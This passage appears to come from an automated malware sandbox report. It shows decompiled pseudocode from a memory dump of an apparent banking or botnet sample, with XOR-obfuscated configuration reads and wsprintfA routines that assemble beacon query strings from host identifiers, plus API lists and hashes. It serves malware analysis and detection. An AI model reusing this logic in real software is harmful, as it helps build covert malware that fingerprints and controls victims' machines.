				_t98 = __ecx;
				_t26 =  *0x463d2a4; // 0x63699bc3
				if(E04637145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x463d2d8 = _v8;
				}
				_t31 =  *0x463d2a4; // 0x63699bc3
				if(E04637145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x463d2a4; // 0x63699bc3
				if(E04637145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x463d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x463d2a4; // 0x63699bc3
						_t43 = E04636B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x463d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x463d2a4; // 0x63699bc3
						_t44 = E04636B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x463d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x463d2a4; // 0x63699bc3
						_t45 = E04636B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x463d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x463d2a4; // 0x63699bc3
						_t46 = E04636B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x463d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x463d2a4; // 0x63699bc3
						_t47 = E04636B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x463d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x463d2a4; // 0x63699bc3
						_t48 = E04636B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E046356FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04636702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x463d2a4; // 0x63699bc3
						_t49 = E04636B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E046356FA(0, _t49) != 0) {
						_t114 =  *0x463d32c; // 0x4ec95b0
						E046323F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x463d2a4; // 0x63699bc3
						_t50 = E04636B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x463d2a8; // 0x88a5a8
						_t20 = _t51 + 0x463e252; // 0x616d692f
						 *0x463d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E046356FA(0, _t50);
						 *0x463d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x463d2a4; // 0x63699bc3
								_t53 = E04636B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x463d2a8; // 0x88a5a8
								_t21 = _t54 + 0x463e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E046356FA(0, _t53);
							}
							 *0x463d340 = _t55;
							HeapFree( *0x463d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x0463888e
                                                          0x04638891
                                                          0x046388b1
                                                          0x046388bf
                                                          0x046388bf
                                                          0x046388c4
                                                          0x046388de
                                                          0x04638b0d
                                                          0x04638b14
                                                          0x04638b1b
                                                          0x04638b1b
                                                          0x046388e4
                                                          0x04638900
                                                          0x04638afb
                                                          0x04638b05
                                                          0x00000000
                                                          0x04638906
                                                          0x04638906
                                                          0x0463890b
                                                          0x04638921
                                                          0x0463890d
                                                          0x0463890d
                                                          0x0463891a
                                                          0x0463891a
                                                          0x0463892b
                                                          0x0463892d
                                                          0x04638937
                                                          0x0463893c
                                                          0x0463893c
                                                          0x04638937
                                                          0x04638943
                                                          0x04638959
                                                          0x04638945
                                                          0x04638945
                                                          0x04638952
                                                          0x04638952
                                                          0x0463895d
                                                          0x0463895f
                                                          0x04638969
                                                          0x0463896e
                                                          0x0463896e
                                                          0x04638969
                                                          0x04638975
                                                          0x0463898b
                                                          0x04638977
                                                          0x04638977
                                                          0x04638984
                                                          0x04638984
                                                          0x0463898f
                                                          0x04638991
                                                          0x0463899b
                                                          0x046389a0
                                                          0x046389a0
                                                          0x0463899b
                                                          0x046389a7
                                                          0x046389bd
                                                          0x046389a9
                                                          0x046389a9
                                                          0x046389b6
                                                          0x046389b6
                                                          0x046389c1
                                                          0x046389c3
                                                          0x046389cd
                                                          0x046389d2
                                                          0x046389d2
                                                          0x046389cd
                                                          0x046389d9
                                                          0x046389ef
                                                          0x046389db
                                                          0x046389db
                                                          0x046389e8
                                                          0x046389e8
                                                          0x046389f3
                                                          0x046389f5
                                                          0x046389ff
                                                          0x04638a04
                                                          0x04638a04
                                                          0x046389ff
                                                          0x04638a0b
                                                          0x04638a21
                                                          0x04638a0d
                                                          0x04638a0d
                                                          0x04638a1a
                                                          0x04638a1a
                                                          0x04638a25
                                                          0x04638a27
                                                          0x04638a2a
                                                          0x04638a2b
                                                          0x04638a32
                                                          0x04638a34
                                                          0x04638a35
                                                          0x04638a35
                                                          0x04638a32
                                                          0x04638a3c
                                                          0x04638a52
                                                          0x04638a3e
                                                          0x04638a3e
                                                          0x04638a4b
                                                          0x04638a4b
                                                          0x04638a56
                                                          0x04638a64
                                                          0x04638a6e
                                                          0x04638a6e
                                                          0x04638a75
                                                          0x04638a8b
                                                          0x04638a77
                                                          0x04638a77
                                                          0x04638a84
                                                          0x04638a84
                                                          0x04638a8f
                                                          0x04638aa2
                                                          0x04638aa2
                                                          0x04638aa7
                                                          0x04638aad
                                                          0x00000000
                                                          0x04638a91
                                                          0x04638a94
                                                          0x04638a99
                                                          0x04638aa0
                                                          0x04638ab2
                                                          0x04638ab4
                                                          0x04638aca
                                                          0x04638ab6
                                                          0x04638ab6
                                                          0x04638ac3
                                                          0x04638ac3
                                                          0x04638ace
                                                          0x04638ada
                                                          0x04638adf
                                                          0x04638adf
                                                          0x04638ad0
                                                          0x04638ad3
                                                          0x04638ad3
                                                          0x04638aed
                                                          0x04638af2
                                                          0x04638af8
                                                          0x00000000
                                                          0x04638af8
                                                          0x00000000
                                                          0x04638aa0
                                                          0x04638a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 046389C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 046389FB
                                                          • HeapFree.KERNEL32(00000000,04635D25,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008,?,04635D25), ref: 04638AF2
                                                          • HeapFree.KERNEL32(00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008,?,04635D25), ref: 04638B05
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b14601ca26e4ee99b8f16806b5a055aba639e1455f83f38be6b5a5b24f3e787b
                                                          • Instruction ID: dc62e13dbf0c9b7a230a8f680439bc7d5719767bf4c48877e0f8b357af4f2ddd
                                                          • Opcode Fuzzy Hash: b14601ca26e4ee99b8f16806b5a055aba639e1455f83f38be6b5a5b24f3e787b
                                                          • Instruction Fuzzy Hash: C0719E71A001C5AFE710FBB9DD8499BB7EDEF98346B281915B502D7204FA39FD428B24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04631F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E04631F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x463d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x463d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x463d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E0463D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x463d2a8; // 0x88a5a8
				_t3 = _t30 + 0x463e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x463d02c,  *0x463d004, _t25);
				_t33 = E046356CD();
				_t34 =  *0x463d2a8; // 0x88a5a8
				_t4 = _t34 + 0x463e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E046358DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x463d2a8; // 0x88a5a8
					_t6 = _t83 + 0x463e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x463d238, 0, _t96);
				}
				_t97 = E0463A199();
				if(_t97 != 0) {
					_t78 =  *0x463d2a8; // 0x88a5a8
					_t8 = _t78 + 0x463e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x463d238, 0, _t97);
				}
				_t98 =  *0x463d32c; // 0x4ec95b0
				_a32 = E04634622(0x463d00a, _t98 + 4);
				_t42 =  *0x463d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x463d2a8; // 0x88a5a8
					_t11 = _t74 + 0x463e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x463d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x463d2a8; // 0x88a5a8
					_t13 = _t71 + 0x463e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x463d238, 0, 0x800);
					if(_t100 != 0) {
						E0463518F(GetTickCount());
						_t50 =  *0x463d32c; // 0x4ec95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x463d32c; // 0x4ec95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x463d32c; // 0x4ec95b0
						_t103 = E04631BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x463c28c);
							_push(_t103);
							_t62 = E0463361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04636777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04636761();
								}
								HeapFree( *0x463d238, 0, _v44);
							}
							HeapFree( *0x463d238, 0, _t103);
						}
						HeapFree( *0x463d238, 0, _t100);
					}
					HeapFree( *0x463d238, 0, _a24);
				}
				HeapFree( *0x463d238, 0, _t105);
				return _a12;
			}
















































                                                          0x04631f13
                                                          0x04631f13
                                                          0x04631f13
                                                          0x04631f18
                                                          0x04631f1e
                                                          0x04631f28
                                                          0x04631f2a
                                                          0x04631f2a
                                                          0x04631f37
                                                          0x04631f42
                                                          0x04631f45
                                                          0x04631f50
                                                          0x04631f53
                                                          0x04631f58
                                                          0x04631f5b
                                                          0x04631f60
                                                          0x04631f63
                                                          0x04631f6f
                                                          0x04631f7c
                                                          0x04631f7e
                                                          0x04631f84
                                                          0x04631f89
                                                          0x04631f94
                                                          0x04631f96
                                                          0x04631f99
                                                          0x04631fa0
                                                          0x04631fa4
                                                          0x04631fa6
                                                          0x04631fab
                                                          0x04631fb7
                                                          0x04631fb9
                                                          0x04631fc5
                                                          0x04631fc7
                                                          0x04631fc7
                                                          0x04631fd2
                                                          0x04631fd6
                                                          0x04631fd8
                                                          0x04631fdd
                                                          0x04631fe9
                                                          0x04631feb
                                                          0x04631ff7
                                                          0x04631ff9
                                                          0x04631ff9
                                                          0x04631fff
                                                          0x04632012
                                                          0x04632016
                                                          0x0463201d
                                                          0x04632020
                                                          0x04632025
                                                          0x04632030
                                                          0x04632032
                                                          0x04632035
                                                          0x04632035
                                                          0x04632037
                                                          0x0463203e
                                                          0x04632041
                                                          0x04632046
                                                          0x04632050
                                                          0x04632052
                                                          0x0463205a
                                                          0x04632073
                                                          0x04632077
                                                          0x04632083
                                                          0x04632088
                                                          0x04632091
                                                          0x046320a2
                                                          0x046320a6
                                                          0x046320af
                                                          0x046320b5
                                                          0x046320c2
                                                          0x046320cf
                                                          0x046320d5
                                                          0x046320e1
                                                          0x046320e7
                                                          0x046320e8
                                                          0x046320ed
                                                          0x046320f3
                                                          0x046320f9
                                                          0x04632100
                                                          0x04632107
                                                          0x0463210d
                                                          0x04632114
                                                          0x04632118
                                                          0x04632123
                                                          0x04632128
                                                          0x0463212e
                                                          0x04632137
                                                          0x04632137
                                                          0x04632148
                                                          0x04632148
                                                          0x04632157
                                                          0x04632157
                                                          0x04632166
                                                          0x04632166
                                                          0x04632178
                                                          0x04632178
                                                          0x04632187
                                                          0x04632198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04631F2A
                                                          • wsprintfA.USER32 ref: 04631F77
                                                          • wsprintfA.USER32 ref: 04631F94
                                                          • wsprintfA.USER32 ref: 04631FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04631FC7
                                                          • wsprintfA.USER32 ref: 04631FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04631FF9
                                                          • wsprintfA.USER32 ref: 04632030
                                                          • wsprintfA.USER32 ref: 04632050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0463206D
                                                          • GetTickCount.KERNEL32 ref: 0463207D
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 04632091
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 046320AF
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 04631BB6: strcpy.NTDLL ref: 04631C00
                                                            • Part of subcall function 04631BB6: lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 04631BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                          • StrTrimA.SHLWAPI(00000000,0463C28C,?,04EC95B0), ref: 046320E1
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463361A: lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                            • Part of subcall function 0463361A: lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04632100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04632107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04632114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04632118
                                                            • Part of subcall function 04636777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04636829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04632148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04632157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04EC95B0), ref: 04632166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04632178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04632187
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 77891bb105fbbba7fe172dcb8ca90eee7dd021d5df73b86056792cbeed9b2673
                                                          • Instruction ID: 55e5909741bfa70ce822338a0a20123ccbe046a5d120d8f0f95475f0fcbc6c56
                                                          • Opcode Fuzzy Hash: 77891bb105fbbba7fe172dcb8ca90eee7dd021d5df73b86056792cbeed9b2673
                                                          • Instruction Fuzzy Hash: BB619D325002C4AFE721EBA8EC88E5677E9EB4974AF041514FA05D7260FB3EEC05DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04634AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04634AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x463d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x463d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x463d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E0463D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x463d2a8; // 0x88a5a8
				_t3 = _t64 + 0x463e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x463d02c,  *0x463d004, _t59);
				_t67 = E046356CD();
				_t68 =  *0x463d2a8; // 0x88a5a8
				_t4 = _t68 + 0x463e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E046358DB(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x463d2a8; // 0x88a5a8
					_t7 = _t126 + 0x463e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x463d238, 0, _v8);
				}
				_t73 = E0463A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x463d2a8; // 0x88a5a8
					_t11 = _t121 + 0x463e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x463d238, 0, _v8);
				}
				_t146 =  *0x463d32c; // 0x4ec95b0
				_t75 = E04634622(0x463d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x463d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x463d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x463d238, _t152, _v20);
						goto L26;
					}
					E0463518F(GetTickCount());
					_t82 =  *0x463d32c; // 0x4ec95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x463d32c; // 0x4ec95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x463d32c; // 0x4ec95b0
					_t148 = E04631BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x463d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x463c28c);
					_push(_t148);
					_t94 = E0463361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x463d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04639070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04636761();
						L22:
						HeapFree( *0x463d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E046369B4(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E0463391F(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E0463A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04635800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0463A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                          0x04634ab6
                                                          0x04634ab6
                                                          0x04634ab6
                                                          0x04634abf
                                                          0x04634ac8
                                                          0x04634aca
                                                          0x04634aca
                                                          0x04634ad7
                                                          0x04634ae2
                                                          0x04634ae5
                                                          0x04634aea
                                                          0x04634af3
                                                          0x04634af6
                                                          0x04634afb
                                                          0x04634afe
                                                          0x04634b03
                                                          0x04634b06
                                                          0x04634b12
                                                          0x04634b1f
                                                          0x04634b21
                                                          0x04634b27
                                                          0x04634b2c
                                                          0x04634b37
                                                          0x04634b39
                                                          0x04634b3c
                                                          0x04634b3e
                                                          0x04634b43
                                                          0x04634b49
                                                          0x04634b4e
                                                          0x04634b51
                                                          0x04634b56
                                                          0x04634b63
                                                          0x04634b65
                                                          0x04634b6b
                                                          0x04634b75
                                                          0x04634b75
                                                          0x04634b77
                                                          0x04634b7c
                                                          0x04634b81
                                                          0x04634b84
                                                          0x04634b89
                                                          0x04634b96
                                                          0x04634b98
                                                          0x04634ba6
                                                          0x04634ba6
                                                          0x04634ba8
                                                          0x04634bb6
                                                          0x04634bbb
                                                          0x04634bbd
                                                          0x04634bc2
                                                          0x04634d83
                                                          0x04634d8d
                                                          0x04634d96
                                                          0x04634bc8
                                                          0x04634bd4
                                                          0x04634bda
                                                          0x04634bdf
                                                          0x04634d77
                                                          0x04634d81
                                                          0x00000000
                                                          0x04634d81
                                                          0x04634beb
                                                          0x04634bf0
                                                          0x04634bf9
                                                          0x04634c0a
                                                          0x04634c0e
                                                          0x04634c17
                                                          0x04634c1d
                                                          0x04634c2c
                                                          0x04634c33
                                                          0x04634c3c
                                                          0x04634c42
                                                          0x04634d6b
                                                          0x04634d75
                                                          0x00000000
                                                          0x04634d75
                                                          0x04634c4e
                                                          0x04634c54
                                                          0x04634c55
                                                          0x04634c5a
                                                          0x04634c5f
                                                          0x04634d61
                                                          0x04634d69
                                                          0x00000000
                                                          0x04634d69
                                                          0x04634c68
                                                          0x04634c6f
                                                          0x04634c77
                                                          0x04634c7c
                                                          0x04634c85
                                                          0x04634c90
                                                          0x04634c95
                                                          0x04634c9a
                                                          0x04634d99
                                                          0x04634d4d
                                                          0x04634d4d
                                                          0x04634d52
                                                          0x04634d5d
                                                          0x04634d5f
                                                          0x00000000
                                                          0x04634d5f
                                                          0x04634ca4
                                                          0x04634ca9
                                                          0x04634cae
                                                          0x04634cb3
                                                          0x04634cc3
                                                          0x04634cc6
                                                          0x04634ccc
                                                          0x04634cd2
                                                          0x04634cd8
                                                          0x04634cdb
                                                          0x04634ce1
                                                          0x04634ce4
                                                          0x04634ce9
                                                          0x04634ced
                                                          0x04634ced
                                                          0x04634cf9
                                                          0x04634d05
                                                          0x04634d09
                                                          0x04634d0b
                                                          0x04634d10
                                                          0x04634d12
                                                          0x04634d17
                                                          0x04634d1c
                                                          0x04634d29
                                                          0x04634d31
                                                          0x04634d34
                                                          0x04634d34
                                                          0x04634d10
                                                          0x00000000
                                                          0x04634cfb
                                                          0x04634cff
                                                          0x04634d36
                                                          0x04634d39
                                                          0x04634d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04634d42
                                                          0x04634d01
                                                          0x00000000
                                                          0x04634d01
                                                          0x04634cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04634ACA
                                                          • wsprintfA.USER32 ref: 04634B1A
                                                          • wsprintfA.USER32 ref: 04634B37
                                                          • wsprintfA.USER32 ref: 04634B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634B75
                                                          • wsprintfA.USER32 ref: 04634B96
